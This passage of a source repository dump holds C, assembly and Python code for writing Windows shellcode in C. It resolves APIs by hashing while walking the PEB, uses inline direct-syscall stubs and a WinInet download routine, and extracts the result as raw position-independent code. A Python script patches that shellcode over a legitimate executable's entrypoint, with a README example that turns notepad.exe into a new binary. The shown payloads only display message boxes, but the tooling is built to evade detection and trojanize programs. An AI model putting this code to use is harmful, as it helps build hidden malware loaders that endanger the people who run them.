NTSTATUS status = ZwAllocateVirtualMemory(NtCurrentProcess(), &ptr_memory, 0, &mem_size, MEM_COMMIT, PAGE_READWRITE); 43 | if (status != STATUS_SUCCESS) 44 | goto cleanup; 45 | #else 46 | uint64_t _VirtualAlloc = getFunctionPtr(HASH_KERNEL32, HASH_VIRTUALALLOC); 47 | ptr_memory = ((VIRTUALALLOC)_VirtualAlloc)(0, mem_size, MEM_COMMIT, PAGE_READWRITE); 48 | #endif 49 | 50 | h_session = ((INTERNETOPENA)_InternetOpenA)(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); 51 | if (!h_session) 52 | goto cleanup; 53 | 54 | h_connect = ((INTERNETCONNECTA)_InternetConnectA)(h_session, hostname, port, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 1); 55 | if (!h_connect) 56 | goto cleanup; 57 | 58 | h_request = ((HTTPOPENREQUESTA)_HttpOpenRequestA)(h_connect, (LPCTSTR)&method, (LPCTSTR)&endpoint, NULL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_RELOAD, 1); 59 | if (!h_request) 60 | goto cleanup; 61 | 62 | if (((HTTPSENDREQUESTA)_HttpSendRequestA)(h_request, NULL, 0, NULL, 0) == FAIL) 63 | goto cleanup; 64 | 65 | do { 66 | 67 | if (((INTERNETREADFILE)_InternetReadFile)(h_request, (LPVOID)((uint64_t)ptr_memory + dw_read_total), MAX_BUFFER - dw_read_total, &dw_read) == FAIL) 68 | break; 69 | 70 | dw_read_total += dw_read; 71 | 72 | } while (dw_read); 73 | 74 | if(dw_read_total) 75 | ((MESSAGEBOXA)_MessageBoxA)(0, ptr_memory, ptr_memory, 1); 76 | 77 | dw_success = SUCCESS; 78 | 79 | cleanup: 80 | 81 | ((INTERNETCLOSEHANDLE)_InternetCloseHandle)(h_session); 82 | ((INTERNETCLOSEHANDLE)_InternetCloseHandle)(h_connect); 83 | ((INTERNETCLOSEHANDLE)_InternetCloseHandle)(h_request); 84 | 85 | if(ptr_memory != NULL) 86 | ((VIRTUALFREE)_VirtualFree)(ptr_memory, 0, MEM_RELEASE); 87 | 88 | return dw_success; 89 | 90 | } -------------------------------------------------------------------------------- /DownloadString_Syscalls/Syscalls.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "windows.h" 4 | #include "syscalls-asm.h" 5 | 6 | #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 7 | #define STATUS_SUCCESS 0 8 | 9 | EXTERN_C NTSTATUS NtAllocateVirtualMemory( 10 | IN HANDLE ProcessHandle, 11 | IN OUT PVOID * BaseAddress, 12 | IN ULONG ZeroBits, 13 | IN OUT PSIZE_T RegionSize, 14 | IN ULONG AllocationType, 15 | IN ULONG Protect); 16 | -------------------------------------------------------------------------------- /DownloadString_Syscalls/adjuststack.asm: -------------------------------------------------------------------------------- 1 | ; Based on http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html and https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/ 2 | 3 | extern go 4 | global alignstack 5 | 6 | segment .text 7 | 8 | alignstack: 9 | push rsi 10 | mov rsi, rsp 11 | and rsp, 0FFFFFFFFFFFFFFF0h 12 | sub rsp, 020h 13 | call go 14 | mov rsp, rsi 15 | pop rsi 16 | ret 17 | -------------------------------------------------------------------------------- /DownloadString_Syscalls/extract.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for i in $(objdump -d DownloadString_Syscall.exe | grep "^ " | cut -f2); do echo -e -n "\x$i"; done >> DownloadString_Syscall.bin 3 | -------------------------------------------------------------------------------- /DownloadString_Syscalls/makefile: -------------------------------------------------------------------------------- 1 | # based on https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/ 2 | make: 3 | nasm -f win64 adjuststack.asm -o adjuststack.o 4 | x86_64-w64-mingw32-gcc ApiResolve.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o ApiResolve.o -Wl,--no-seh 5 | x86_64-w64-mingw32-gcc DownloadString_Syscall.c -Wall -m64 -masm=intel -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o DownloadString_Syscall.o -Wl,--no-seh 6 | x86_64-w64-mingw32-ld -s adjuststack.o ApiResolve.o DownloadString_Syscall.o -o DownloadString_Syscall.exe 7 | -------------------------------------------------------------------------------- /DownloadString_Syscalls/syscalls-asm.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Syscalls.h" 3 | 4 | #define ZwAllocateVirtualMemory NtAllocateVirtualMemory 5 | __asm__("NtAllocateVirtualMemory: \n\ 6 | mov rax, gs:[0x60] \n\ 7 | NtAllocateVirtualMemory_Check_X_X_XXXX: \n\ 8 | cmp dword ptr [rax+0x118], 6 \n\ 9 | je NtAllocateVirtualMemory_Check_6_X_XXXX \n\ 10 | cmp dword ptr [rax+0x118], 10 \n\ 11 | je NtAllocateVirtualMemory_Check_10_0_XXXX \n\ 12 | jmp NtAllocateVirtualMemory_SystemCall_Unknown \n\ 13 | NtAllocateVirtualMemory_Check_6_X_XXXX: \n\ 14 | cmp dword ptr [rax+0x11c], 1 \n\ 15 | je NtAllocateVirtualMemory_Check_6_1_XXXX \n\ 16 | cmp dword ptr [rax+0x11c], 2 \n\ 17 | je NtAllocateVirtualMemory_SystemCall_6_2_XXXX \n\ 18 | cmp dword ptr [rax+0x11c], 3 \n\ 19 | je NtAllocateVirtualMemory_SystemCall_6_3_XXXX \n\ 20 | jmp NtAllocateVirtualMemory_SystemCall_Unknown \n\ 21 | NtAllocateVirtualMemory_Check_6_1_XXXX: \n\ 22 | cmp word ptr [rax+0x120], 7600 \n\ 23 | je NtAllocateVirtualMemory_SystemCall_6_1_7600 \n\ 24 | cmp word ptr [rax+0x120], 7601 \n\ 25 | je NtAllocateVirtualMemory_SystemCall_6_1_7601 \n\ 26 | jmp NtAllocateVirtualMemory_SystemCall_Unknown \n\ 27 | NtAllocateVirtualMemory_Check_10_0_XXXX: \n\ 28 | cmp word ptr [rax+0x120], 10240 \n\ 29 | je NtAllocateVirtualMemory_SystemCall_10_0_10240 \n\ 30 | cmp word ptr [rax+0x120], 10586 \n\ 31 | je NtAllocateVirtualMemory_SystemCall_10_0_10586 \n\ 32 | cmp word ptr [rax+0x120], 14393 \n\ 33 | je NtAllocateVirtualMemory_SystemCall_10_0_14393 \n\ 34 | cmp word ptr [rax+0x120], 15063 \n\ 35 | je NtAllocateVirtualMemory_SystemCall_10_0_15063 \n\ 36 | cmp word ptr [rax+0x120], 16299 \n\ 37 | je NtAllocateVirtualMemory_SystemCall_10_0_16299 \n\ 38 | cmp word ptr [rax+0x120], 17134 \n\ 39 | je NtAllocateVirtualMemory_SystemCall_10_0_17134 \n\ 40 | cmp word ptr [rax+0x120], 17763 \n\ 41 | je NtAllocateVirtualMemory_SystemCall_10_0_17763 \n\ 42 | cmp word ptr [rax+0x120], 18362 \n\ 43 | je NtAllocateVirtualMemory_SystemCall_10_0_18362 \n\ 44 | cmp word ptr [rax+0x120], 18363 \n\ 45 | je NtAllocateVirtualMemory_SystemCall_10_0_18363 \n\ 46 | cmp word ptr [rax+0x120], 19041 \n\ 47 | je NtAllocateVirtualMemory_SystemCall_10_0_19041 \n\ 48 | cmp word ptr [rax+0x120], 19042 \n\ 49 | je NtAllocateVirtualMemory_SystemCall_10_0_19042 \n\ 50 | jmp NtAllocateVirtualMemory_SystemCall_Unknown \n\ 51 | NtAllocateVirtualMemory_SystemCall_6_1_7600: \n\ 52 | mov eax, 0x0015 \n\ 53 | jmp NtAllocateVirtualMemory_Epilogue \n\ 54 | NtAllocateVirtualMemory_SystemCall_6_1_7601: \n\ 55 | mov eax, 0x0015 \n\ 56 | jmp NtAllocateVirtualMemory_Epilogue \n\ 57 | NtAllocateVirtualMemory_SystemCall_6_2_XXXX: \n\ 58 | mov eax, 0x0016 \n\ 59 | jmp NtAllocateVirtualMemory_Epilogue \n\ 60 | NtAllocateVirtualMemory_SystemCall_6_3_XXXX: \n\ 61 | mov eax, 0x0017 \n\ 62 | jmp NtAllocateVirtualMemory_Epilogue \n\ 63 | NtAllocateVirtualMemory_SystemCall_10_0_10240: \n\ 64 | mov eax, 0x0018 \n\ 65 | jmp NtAllocateVirtualMemory_Epilogue \n\ 66 | NtAllocateVirtualMemory_SystemCall_10_0_10586: \n\ 67 | mov eax, 0x0018 \n\ 68 | jmp NtAllocateVirtualMemory_Epilogue \n\ 69 | NtAllocateVirtualMemory_SystemCall_10_0_14393: \n\ 70 | mov eax, 0x0018 \n\ 71 | jmp NtAllocateVirtualMemory_Epilogue \n\ 72 | NtAllocateVirtualMemory_SystemCall_10_0_15063: \n\ 73 | mov eax, 0x0018 \n\ 74 | jmp NtAllocateVirtualMemory_Epilogue \n\ 75 | NtAllocateVirtualMemory_SystemCall_10_0_16299: \n\ 76 | mov eax, 0x0018 \n\ 77 | jmp NtAllocateVirtualMemory_Epilogue \n\ 78 | NtAllocateVirtualMemory_SystemCall_10_0_17134: \n\ 79 | mov eax, 0x0018 \n\ 80 | jmp NtAllocateVirtualMemory_Epilogue \n\ 81 | NtAllocateVirtualMemory_SystemCall_10_0_17763: \n\ 82 | mov eax, 0x0018 \n\ 83 | jmp NtAllocateVirtualMemory_Epilogue \n\ 84 | NtAllocateVirtualMemory_SystemCall_10_0_18362: \n\ 85 | mov eax, 0x0018 \n\ 86 | jmp NtAllocateVirtualMemory_Epilogue \n\ 87 | NtAllocateVirtualMemory_SystemCall_10_0_18363: \n\ 88 | mov eax, 0x0018 \n\ 89 | jmp NtAllocateVirtualMemory_Epilogue \n\ 90 | NtAllocateVirtualMemory_SystemCall_10_0_19041: \n\ 91 | mov eax, 0x0018 \n\ 92 | jmp NtAllocateVirtualMemory_Epilogue \n\ 93 | NtAllocateVirtualMemory_SystemCall_10_0_19042: \n\ 94 | mov eax, 0x0018 \n\ 95 | jmp NtAllocateVirtualMemory_Epilogue \n\ 96 | NtAllocateVirtualMemory_SystemCall_Unknown: \n\ 97 | ret \n\ 98 | NtAllocateVirtualMemory_Epilogue: \n\ 99 | mov r10, rcx \n\ 100 | syscall \n\ 101 | ret \n\ 102 | "); 103 | 104 | 105 | -------------------------------------------------------------------------------- /HelloWorld/APIResolve.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "windows.h" 5 | 6 | #include "wininet.h" 7 | 8 | uint64_t getFunctionPtr(unsigned long, unsigned long); 9 | 10 | // ---- KERNEL32 ---- 11 | #define HASH_KERNEL32 0x7040ee75 12 | #define HASH_LOADLIBRARYA 0x5fbff0fb 13 | #define HASH_VIRTUALFREE 0x668fcf2e 14 | #define HASH_VIRTUALALLOC 0x382c0f97 15 | 16 | typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR); 17 | typedef BOOL(WINAPI* VIRTUALFREE)(LPVOID, SIZE_T, DWORD); 18 | typedef LPVOID(WINAPI* VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD); 19 | 20 | // ---- USER32 ---- 21 | #define HASH_USER32 0x5a6bd3f3 22 | #define HASH_MESSAGEBOXA 0x384f14b4 23 | 24 | typedef int(WINAPI* MESSAGEBOXA)(HWND, LPCSTR, LPCSTR, UINT); 25 | 26 | // ---- Wininet.dll ---- 27 | #define HASH_WININET 0x8dbd9c6d 28 | #define HASH_INTERNETOPENA 0xf4ad70a1 29 | #define HASH_INTERNETREADFILE 0xfb4f8eaa 30 | #define HASH_INTERNETCLOSEHANDLE 0x4241bef0 31 | #define HASH_INTERNETCONNECTA 0x44536159 32 | #define HASH_HTTPOPENREQUESTA 0xf0fcb9e1 33 | #define HASH_HTTPSENDREQUESTA 0x915115b9 34 | 35 | typedef HINTERNET(WINAPI* INTERNETOPENA)(LPCSTR, DWORD, LPCSTR, LPCSTR, DWORD); 36 | typedef BOOL(WINAPI* INTERNETREADFILE)(HINTERNET, LPVOID, DWORD, LPDWORD); 37 | typedef BOOL(WINAPI* INTERNETCLOSEHANDLE)(HINTERNET); 38 | typedef HINTERNET(WINAPI* INTERNETCONNECTA)(HINTERNET, LPCSTR, INTERNET_PORT, LPCSTR, LPCSTR, DWORD, DWORD, DWORD_PTR); 39 | typedef HINTERNET(WINAPI* HTTPOPENREQUESTA)(HINTERNET, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR*, DWORD, DWORD_PTR); 40 | typedef BOOL(WINAPI* HTTPSENDREQUESTA)(HINTERNET, LPCSTR, DWORD, LPVOID, DWORD); 41 | 42 | typedef PCSTR(WINAPI* STRSTRA)(PCSTR, PCSTR); 43 | 44 | typedef struct _UNICODE_STR { 45 | USHORT Length; 46 | USHORT MaximumLength; 47 | PWSTR pBuffer; 48 | } UNICODE_STR, * PUNICODE_STR; 49 | 50 | typedef struct _PEB_LDR_DATA 51 | { 52 | DWORD dwLength; 53 | DWORD dwInitialized; 54 | LPVOID lpSsHandle; 55 | LIST_ENTRY InLoadOrderModuleList; 56 | LIST_ENTRY InMemoryOrderModuleList; 57 | LIST_ENTRY InInitializationOrderModuleList; 58 | LPVOID lpEntryInProgress; 59 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 60 | 61 | typedef struct _LDR_DATA_TABLE_ENTRY 62 | { 63 | LIST_ENTRY InMemoryOrderModuleList; 64 | LIST_ENTRY InInitializationOrderModuleList; 65 | PVOID DllBase; 66 | PVOID EntryPoint; 67 | ULONG SizeOfImage; 68 | UNICODE_STR FullDllName; 69 | UNICODE_STR BaseDllName; 70 | ULONG Flags; 71 | SHORT LoadCount; 72 | SHORT TlsIndex; 73 | LIST_ENTRY HashTableEntry; 74 | ULONG TimeDateStamp; 75 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 76 | 77 | typedef struct _PEB_FREE_BLOCK 78 | { 79 | struct _PEB_FREE_BLOCK* pNext; 80 | DWORD dwSize; 81 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; 82 | 83 | typedef struct __PEB 84 | { 85 | BYTE bInheritedAddressSpace; 86 | BYTE bReadImageFileExecOptions; 87 | BYTE bBeingDebugged; 88 | BYTE bSpareBool; 89 | LPVOID lpMutant; 90 | LPVOID lpImageBaseAddress; 91 | PPEB_LDR_DATA pLdr; 92 | LPVOID lpProcessParameters; 93 | LPVOID lpSubSystemData; 94 | LPVOID lpProcessHeap; 95 | PRTL_CRITICAL_SECTION pFastPebLock; 96 | LPVOID lpFastPebLockRoutine; 97 | LPVOID lpFastPebUnlockRoutine; 98 | DWORD dwEnvironmentUpdateCount; 99 | LPVOID lpKernelCallbackTable; 100 | DWORD dwSystemReserved; 101 | DWORD dwAtlThunkSListPtr32; 102 | PPEB_FREE_BLOCK pFreeList; 103 | DWORD dwTlsExpansionCounter; 104 | LPVOID lpTlsBitmap; 105 | DWORD dwTlsBitmapBits[2]; 106 | LPVOID lpReadOnlySharedMemoryBase; 107 | LPVOID lpReadOnlySharedMemoryHeap; 108 | LPVOID lpReadOnlyStaticServerData; 109 | LPVOID lpAnsiCodePageData; 110 | LPVOID lpOemCodePageData; 111 | LPVOID lpUnicodeCaseTableData; 112 | DWORD dwNumberOfProcessors; 113 | DWORD dwNtGlobalFlag; 114 | LARGE_INTEGER liCriticalSectionTimeout; 115 | DWORD dwHeapSegmentReserve; 116 | DWORD dwHeapSegmentCommit; 117 | DWORD dwHeapDeCommitTotalFreeThreshold; 118 | DWORD dwHeapDeCommitFreeBlockThreshold; 119 | DWORD dwNumberOfHeaps; 120 | DWORD dwMaximumNumberOfHeaps; 121 | LPVOID lpProcessHeaps; 122 | LPVOID lpGdiSharedHandleTable; 123 | LPVOID lpProcessStarterHelper; 124 | DWORD dwGdiDCAttributeList; 125 | LPVOID lpLoaderLock; 126 | DWORD dwOSMajorVersion; 127 | DWORD dwOSMinorVersion; 128 | WORD wOSBuildNumber; 129 | WORD wOSCSDVersion; 130 | DWORD dwOSPlatformId; 131 | DWORD dwImageSubsystem; 132 | DWORD dwImageSubsystemMajorVersion; 133 | DWORD dwImageSubsystemMinorVersion; 134 | DWORD dwImageProcessAffinityMask; 135 | DWORD dwGdiHandleBuffer[34]; 136 | LPVOID lpPostProcessInitRoutine; 137 | LPVOID lpTlsExpansionBitmap; 138 | DWORD dwTlsExpansionBitmapBits[32]; 139 | DWORD dwSessionId; 140 | ULARGE_INTEGER liAppCompatFlags; 141 | ULARGE_INTEGER liAppCompatFlagsUser; 142 | LPVOID lppShimData; 143 | LPVOID lpAppCompatInfo; 144 | UNICODE_STR usCSDVersion; 145 | LPVOID lpActivationContextData; 146 | LPVOID lpProcessAssemblyStorageMap; 147 | LPVOID lpSystemDefaultActivationContextData; 148 | LPVOID lpSystemAssemblyStorageMap; 149 | DWORD dwMinimumStackCommit; 150 | } _PEB, * _PPEB; 151 | -------------------------------------------------------------------------------- /HelloWorld/ApiResolve.c: -------------------------------------------------------------------------------- 1 | #include "APIResolve.h" 2 | 3 | static uint64_t getDllBase(unsigned long); 4 | static uint64_t loadDll(unsigned long); 5 | static uint64_t parseHdrForPtr(uint64_t, unsigned long); 6 | 7 | static unsigned long djb2(unsigned char*); 8 | static unsigned long unicode_djb2(const wchar_t* str); 9 | static WCHAR* toLower(WCHAR* str); 10 | 11 | uint64_t 12 | getFunctionPtr(unsigned long dll_hash, unsigned long function_hash) { 13 | 14 | uint64_t dll_base = 0x00; 15 | uint64_t ptr_function = 0x00; 16 | 17 | dll_base = getDllBase(dll_hash); 18 | if (dll_base == 0) { 19 | dll_base = loadDll(dll_hash); 20 | if (dll_base == 0) 21 | return 0; 22 | } 23 | 24 | ptr_function = parseHdrForPtr(dll_base, function_hash); 25 | 26 | return ptr_function; 27 | } 28 | 29 | static uint64_t 30 | loadDll(unsigned long dll_hash) { 31 | 32 | uint64_t kernel32_base = 0x00; 33 | uint64_t fptr_loadLibary = 0x00; 34 | uint64_t ptr_loaded_dll = 0x00; 35 | 36 | kernel32_base = getDllBase(HASH_KERNEL32); 37 | if (kernel32_base == 0x00) 38 | return 0; 39 | 40 | fptr_loadLibary = parseHdrForPtr(kernel32_base, HASH_LOADLIBRARYA); 41 | if (fptr_loadLibary == 0x00) 42 | return 0; 43 | 44 | if (dll_hash == HASH_USER32) { 45 | char dll_name[] = { 'U', 's', 'e', 'r', '3' ,'2' ,'.', 'd', 'l', 'l', 0x00 }; 46 | ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name); 47 | } else if (dll_hash == HASH_WININET) { 48 | char dll_name[] = { 'W', 'i', 'n', 'i', 'n', 'e', 't', '.', 'd','l','l',0x00 }; 49 | ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name); 50 | } 51 | 52 | return ptr_loaded_dll; 53 | 54 | } 55 | 56 | static uint64_t 57 | parseHdrForPtr(uint64_t dll_base, unsigned long function_hash) { 58 | 59 | PIMAGE_NT_HEADERS nt_hdrs = NULL; 60 | PIMAGE_DATA_DIRECTORY data_dir= NULL; 61 | PIMAGE_EXPORT_DIRECTORY export_dir= NULL; 62 | 63 | uint32_t* ptr_exportadrtable = 0x00; 64 | uint32_t* ptr_namepointertable = 0x00; 65 | uint16_t* ptr_ordinaltable = 0x00; 66 | 67 | uint32_t idx_functions = 0x00; 68 | 69 | unsigned char* ptr_function_name = NULL; 70 | 71 | 72 | nt_hdrs = (PIMAGE_NT_HEADERS)(dll_base + (uint64_t)((PIMAGE_DOS_HEADER)(size_t)dll_base)->e_lfanew); 73 | data_dir = (PIMAGE_DATA_DIRECTORY)&nt_hdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; 74 | export_dir = (PIMAGE_EXPORT_DIRECTORY)(dll_base + (uint64_t)data_dir->VirtualAddress); 75 | 76 | ptr_exportadrtable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfFunctions); 77 | ptr_namepointertable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfNames); 78 | ptr_ordinaltable = (uint16_t*)(dll_base + (uint64_t)export_dir->AddressOfNameOrdinals); 79 | 80 | for(idx_functions = 0; idx_functions < export_dir->NumberOfNames; idx_functions++){ 81 | 82 | ptr_function_name = (unsigned char*)dll_base + (ptr_namepointertable[idx_functions]); 83 | if (djb2(ptr_function_name) == function_hash) { 84 | WORD nameord = ptr_ordinaltable[idx_functions]; 85 | DWORD rva = ptr_exportadrtable[nameord]; 86 | return dll_base + rva; 87 | } 88 | 89 | } 90 | 91 | return 0; 92 | } 93 | 94 | 95 | 96 | static uint64_t 97 | getDllBase(unsigned long dll_hash) { 98 | 99 | _PPEB ptr_peb = NULL; 100 | PPEB_LDR_DATA ptr_ldr_data = NULL; 101 | PLDR_DATA_TABLE_ENTRY ptr_module_entry = NULL, ptr_start_module = NULL; 102 | PUNICODE_STR dll_name = NULL; 103 | 104 | ptr_peb = (_PEB*)__readgsqword(0x60); 105 | ptr_ldr_data = ptr_peb->pLdr; 106 | ptr_module_entry = ptr_start_module = (PLDR_DATA_TABLE_ENTRY)ptr_ldr_data->InMemoryOrderModuleList.Flink; 107 | 108 | do{ 109 | 110 | dll_name = &ptr_module_entry->BaseDllName; 111 | 112 | if (dll_name->pBuffer == NULL) 113 | return 0; 114 | 115 | if (unicode_djb2(toLower(dll_name->pBuffer)) == dll_hash) 116 | return (uint64_t)ptr_module_entry->DllBase; 117 | 118 | ptr_module_entry = (PLDR_DATA_TABLE_ENTRY)ptr_module_entry->InMemoryOrderModuleList.Flink; 119 | 120 | } while (ptr_module_entry != ptr_start_module); 121 | 122 | return 0; 123 | 124 | } 125 | 126 | static unsigned long 127 | djb2(unsigned char* str) 128 | { 129 | unsigned long hash = 5381; 130 | int c; 131 | 132 | while ((c = *str++)) 133 | hash = ((hash << 5) + hash) + c; 134 | 135 | return hash; 136 | } 137 | 138 | unsigned long 139 | unicode_djb2(const wchar_t* str) 140 | { 141 | 142 | unsigned long hash = 5381; 143 | DWORD val; 144 | 145 | while (*str != 0) { 146 | val = (DWORD)*str++; 147 | hash = ((hash << 5) + hash) + val; 148 | } 149 | 150 | return hash; 151 | 152 | } 153 | 154 | static WCHAR* 155 | toLower(WCHAR *str) 156 | { 157 | 158 | WCHAR* start = str; 159 | 160 | while (*str) { 161 | 162 | if (*str <= L'Z' && *str >= 'A') { 163 | *str += 32; 164 | } 165 | 166 | str += 1; 167 | 168 | } 169 | 170 | return start; 171 | 172 | } -------------------------------------------------------------------------------- /HelloWorld/HelloWorld.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thefLink/C-To-Shellcode-Examples/0e8f1007f9d61200dde2103258722b871504f18e/HelloWorld/HelloWorld.bin -------------------------------------------------------------------------------- /HelloWorld/HelloWorld.bin.sgn: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thefLink/C-To-Shellcode-Examples/0e8f1007f9d61200dde2103258722b871504f18e/HelloWorld/HelloWorld.bin.sgn -------------------------------------------------------------------------------- /HelloWorld/HelloWorld.c: -------------------------------------------------------------------------------- 1 | #include "APIResolve.h" 2 | 3 | #define FAIL 0 4 | #define SUCCESS 1 5 | 6 | #ifdef _DEBUG 7 | int 8 | main(void) { 9 | #else 10 | int 11 | go(void) { 12 | #endif 13 | 14 | uint64_t _MessageBoxA = getFunctionPtr(HASH_USER32, HASH_MESSAGEBOXA); 15 | 16 | if (_MessageBoxA == 0x00) 17 | return FAIL; 18 | 19 | char message[] = { 'M', 'o', 'i', 'n', 0x00 }; 20 | ((MESSAGEBOXA)_MessageBoxA)(0, message, message, 1); 21 | 22 | return SUCCESS; 23 | 24 | } -------------------------------------------------------------------------------- /HelloWorld/adjuststack.asm: -------------------------------------------------------------------------------- 1 | ; Based on http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html and https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/ 2 | 3 | extern go 4 | global alignstack 5 | 6 | segment .text 7 | 8 | alignstack: 9 | push rsi 10 | mov rsi, rsp 11 | and rsp, 0FFFFFFFFFFFFFFF0h 12 | sub rsp, 020h 13 | call go 14 | mov rsp, rsi 15 | pop rsi 16 | ret 17 | -------------------------------------------------------------------------------- /HelloWorld/extract.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for i in $(objdump -d HelloWorld.exe | grep "^ " | cut -f2); do echo -e -n "\x$i"; done >> HelloWorld.bin 3 | -------------------------------------------------------------------------------- /HelloWorld/makefile: -------------------------------------------------------------------------------- 1 | # based on https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/ 2 | make: 3 | nasm -f win64 adjuststack.asm -o adjuststack.o 4 | x86_64-w64-mingw32-gcc ApiResolve.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o ApiResolve.o -Wl,--no-seh 5 | x86_64-w64-mingw32-gcc HelloWorld.c -Wall -m64 -masm=intel -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o HelloWorld.o -Wl,--no-seh 6 | x86_64-w64-mingw32-ld -s adjuststack.o ApiResolve.o HelloWorld.o -o HelloWorld.exe 7 | -------------------------------------------------------------------------------- /Loaders/loaderbuilder.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import lief 3 | 4 | def main(f_name_shellcode, f_nameloader, output): 5 | 6 | loader = lief.parse(f_nameloader) 7 | if loader == None: 8 | print("[-] Failed parsing binary") 9 | return 10 | 11 | shellcode = open(f_name_shellcode, "rb").read() 12 | section_entrypoint = None 13 | 14 | print(f"[*] Read {f_name_shellcode} ({str(len(shellcode))} bytes)") 15 | entrypoint = loader.optional_header.addressof_entrypoint 16 | print(f"[*] Parsing {f_nameloader}") 17 | print(f"[*] Entrypoint: {hex(entrypoint)}") 18 | print(f"[**] Searching entrypoint in sections ... ") 19 | for section in loader.sections: 20 | if entrypoint >= section.virtual_address and entrypoint <= section.virtual_address + section.size: 21 | print(f"[**] Entrypoint in: " + section.name) 22 | section_entrypoint = section 23 | 24 | if not section_entrypoint: 25 | print(f"[-] Could not map entrypoint to section :(") 26 | return 27 | 28 | print(f"[*] Entrypoint: {hex(entrypoint)}") 29 | if entrypoint + section_entrypoint.virtual_address + len(shellcode) >= section_entrypoint.virtual_address + section_entrypoint.size: 30 | print(f"[-] Not enough space between entrypoint and section end for shellcode :(") 31 | return 32 | 33 | loader.patch_address(entrypoint, list(shellcode)) 34 | builder = lief.PE.Builder(loader) 35 | builder.build() 36 | builder.write(output) 37 | 38 | if __name__ == "__main__": 39 | 40 | parser = argparse.ArgumentParser() 41 | parser.add_argument("-shellcode", required=True) 42 | parser.add_argument("-loader", required=True) 43 | parser.add_argument("-output", required=True) 44 | args = parser.parse_args() 45 | 46 | main(args.shellcode, args.loader, args.output) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # C-To-Shellcode-Examples 2 | 3 | This repository contains examples on how to write C code which compiles down to an executable living fully in its text segment. 4 | Thus, when extracting the text segment you will obtain position independent code which you can encode with your favourite shellcode encoder. 5 | 6 | The **DownloadString_Syscalls** program, makes use of direct syscalls to obtain memory. Syscalls were generated using [Inline Whisperer](https://github.com/outflanknl/InlineWhispers) 7 | Sample files are provided as .bin (raw extracted text segment) and .bin.sgn (text segment encoded with [sgn](https://github.com/EgeBalci/sgn/). You can execute them using any shellcode loader. 8 | 9 | ## Loader Creation 10 | 11 | Since the output is 100% position independent, there are multiple ways to execute the code. One is to use traditional shellcode loaders / injectors. 12 | Another way is to simply take an existing **.exe** file and overwrite the part of the **.text** segment to which the entrypoint in **optional_header** points with the PIC. 13 | I have added **loaderbuilder.py** to automate this. 14 | 15 | ``` 16 | python loaders\loaderbuilder.py -shellcode .\HelloWorld\HelloWorld.bin -loader C:\Users\user\Desktop\notepad.exe -output C:\Users\user\Desktop\cool.exe 17 | ``` 18 | 19 | Obviously this doesnt work with encoded PIC, since the .text segment is not writable by default. 20 | **Please note**, that the .exe file needs to be copied from system32 to somewhere else before patching. This appears to be a bug in python-lief, but I can't narrow it down :'(. 21 | 22 | ## Credits 23 | 24 | The idea has been well described by various researchers and is nothing new, please see: 25 | 26 | - https://vxug.fakedoma.in/papers/VXUG/Exclusive/FromaCprojectthroughassemblytoshellcodeHasherezade.pdf 27 | - http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html 28 | - https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/ 29 | -------------------------------------------------------------------------------- /WMI_get_pid_service_evt/APIResolve.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "windows.h" 5 | #include "wininet.h" 6 | 7 | #define FAIL 0 8 | #define SUCCESS 1 9 | 10 | uint64_t getFunctionPtr(unsigned long, unsigned long); 11 | 12 | // ---- KERNEL32 ---- 13 | #define HASH_KERNEL32 0x7040ee75 14 | #define HASH_LOADLIBRARYA 0x5fbff0fb 15 | #define HASH_LSTRCMPW 0xd2bfde01 16 | 17 | typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR); 18 | typedef int(WINAPI* LSTRCMPW)(LPCWSTR, LPCWSTR); 19 | 20 | // ---- USER32 ---- 21 | #define HASH_USER32 0x5a6bd3f3 22 | #define HASH_MESSAGEBOXA 0x384f14b4 23 | #define HASH_WSPRINTFA 0xf898b8c3 24 | 25 | typedef int(WINAPI* MESSAGEBOXA)(HWND, LPCSTR, LPCSTR, UINT); 26 | typedef int(WINAPI* WSPRINTFA)(LPSTR, LPCSTR, ...); 27 | 28 | // ---- shlwapi.dll ---- 29 | #define HASH_SHLWAPI 0xa70d9427 30 | #define 